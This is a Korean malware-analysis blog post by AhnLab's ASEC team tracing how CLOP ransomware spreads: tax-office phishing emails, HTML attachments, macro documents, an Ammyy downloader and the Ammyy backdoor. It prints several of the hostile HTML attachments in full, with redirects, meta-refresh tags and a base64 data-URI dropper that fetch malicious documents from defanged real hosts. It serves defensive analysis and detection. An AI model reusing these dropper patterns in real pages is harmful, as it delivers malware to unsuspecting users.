본문 바로가기
악성코드 정보

다양한 형태로 유포되는 CLOP 랜섬웨어

by AhnLab ASEC 분석팀 2019.06.27

자사에서는 그간 Ammyy 백도어의 유포 과정과, Ammyy 백도어와 CLOP 랜섬웨어가 같은 인증서를 사용하는 점들을 블로그에 언급해왔다. 이를 총 정리하여 유포 단에서 마지막 랜섬웨어까지의 유포를 정리하고자 한다. 아래 보이는 [그림1]은 전반적인 구조를 표현한 것으로, 한눈에 보아도 복잡하게 구성되어 있음을 알 수 있다.

 

[그림1] – 흐름 구조도

 

올해 2월 초부터 메일에 악성 문서를 첨부하여 유포되었는데, 지난 530일 자사 블로그(https://asec.ahnlab.com/1234)에 언급되었던 것처럼 국세청을 사칭한 메일을 시작으로 실행을 유도하는 내용과 함께 문서가 아닌 HTML파일이 첨부되어 유포됨을 확인하였다. [그림1]과 같이 하나의 단계가 가장 앞 단에 추가된 셈이다.

 

HTML내부 코드 구조가 지속적으로 변화하고 있는데 그 내용은 아래 [1]과 같다. 지속적으로 자사에서는 진단 패턴을 업데이트하는데 공격자가 이를 우회하기 위함으로 지속 변경한 것으로 추정된다.

유포 날짜

HTML 스크립트 내용

설명

5월 30월 

<html>

<head>

    <title>Downloading, please wait...</title>

</head>

<body>

<script>

    var url= "hxxp://homeone.co.kr/eTaxInvoice_476543853.xls";

    window.location = url;

</script>

</body>

</html>

악성 xls 다운로드 경로로 리다이렉트

6월 3일

<!-- saved from url=(0022)http://internet.e-mail -->

 <!DOCTYPE html>

<html>

<head>

    <meta charset="UTF-8">

    <title>Downloading...</title>

</head>

<body>

<script>

    var url= "hxxp://waiireme.com/20190706_983782.xls";

    window.location = url;

</script>

</body>

</html>

주석 삽입으로 스크립트 실행 경고창 제거

6월 5일(1)

<script>

var someb64data = "0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7

… (생략)…

AAAAAAAAAAAA";

var link = document.createElement("a");

  link.download = "1.xls";

  // Construct the uri

  var uri = 'data:application/vnd.ms-excel;charset=utf-8;base64,' + someb64data;

  link.href = uri;

  document.body.appendChild(link);

  link.click();

  // Cleanup the DOM

  document.body.removeChild(link);

</script>

</html>

html 문서에 url이 아닌, Ammyy 악성코드를 다운로드 하는 엑셀 객체를 포함

6월 5일(2)

<html>

<head>

    <meta http-equiv="refresh" content="1; URL=hxxp://www.ma.mctv.ne.jp/~blanc/C758935.xls">

    <title>다운로드 중 ...</title>

</head>

<body>

다운로드 중 ...

</body>

</html>

html 문서에 한국어로 타이틀 작성, 새로고침 태그 사용(http-equiv=“refresh”)

6월 18일

<head>

  <meta http-equiv="refresh" content="0; URL=hxxp://staler.se/I1806201911266473.doc" />

</head>

<body>

Downloading...

</body>

새로고침 시간이 0로 수정, xls에서 doc 문서로 변경

6월 20일

<head>

  <meta http-equiv="refresh" content="0; URL=hxxp://nanepashemet.com/20.06.2019_781.37.xls" />

 </head>

 

 <h2>다운로드 중입니다 ... 기다려주십시오.</h2>

새로고침 태그 사용과 시간은 동일, URL 경로의 확장자가 doc에서 xls로 변경

 

[1] – HTML 변화 과정

 

 

[그림2] – 6월20일 유포된 HTML

 

해당 HTML이 실행되면 추가 악성 문서를 다운로드받게 된다. 경우에 따라 엑셀 혹은 워드를 다운로드 한다. VBA코드를 이용한 매크로를 이용하거나 숨김 매크로 시트에 XLM 매크로 코드를 사용하기도 한다. (529일에 업로드 된 블로그https://asec.ahnlab.com/1232를 참고)

 

다양한 형식으로 유포되고 있는 문서는 결국 추가 파일을 다운로드하는데 이때, Ammyy 백도어를 바로 다운로드하는 것이 아니라 ‘Ammyy 다운로더를 다운로드한다. 이 다운로더는 PE의 형태 뿐아니라 MSI형태로도 유포중이다. MSI파일과 같은 경우에는 이 인스톨러를 실행하기 위해 윈도우 정상 파일인 msiexec.exe를 이용한다. 해당 파일이 실행되면 인코딩 된 Ammyy 백도어를 다운로드하여 파일마다 다르게 하드코딩 된 키를 이용해 RC4 알고리즘으로 복호화를 수행한다. 복호화 된 PE C:\ProgramData\Nugets\wsus.exe로 저장된다.

 

복호화 된 PE파일이 바로 Ammyy 백도어 파일이다. 이 후의 과정에서는 백도어 통신이 이루어져야 확인이 가능하기 때문에 상세한 과정 확인은 힘들지만 Ammyy백도어와 CLOP랜섬웨어가 같은 시스템에서 발견되는 점과 두 악성코드가 같은 인증서를 쓰는 정황들로 봤을 때 Ammyy 백도어를 통해 CLOP랜섬웨어가 전파되고 있음을 추정할 수 있다.

 

자사에서는 Ammyy 백도어 유포에 대해서, 나아가 CLOP 랜섬웨어까지의 흐름을 지속 분석 중에 있으며 확인되는 내용들에 대해 업로드 할 예정이다.

 

 

이와 관련한 자사의 진단명들은 아래와 같다.


HTML/AmmyyRat.S1~S4
HTML/Redirect

VBA/AMMacro.S1~S8
MSOffice/Xprocess

BinImage/Agent

Backdoor/Win32.Flawedammyy
Backdoor/Win32.Agent

(그 외 다수)

 

 

댓글1

  • Favicon of https://itadventure.tistory.com CrayFall 2019.06.27 12:54 신고

    소스코드를 보니 엑셀파일을 base64 인코딩한 문자열을 해킹도구로활용하기도 하는군요. 엄청 지능적인듯 합니다.
    답글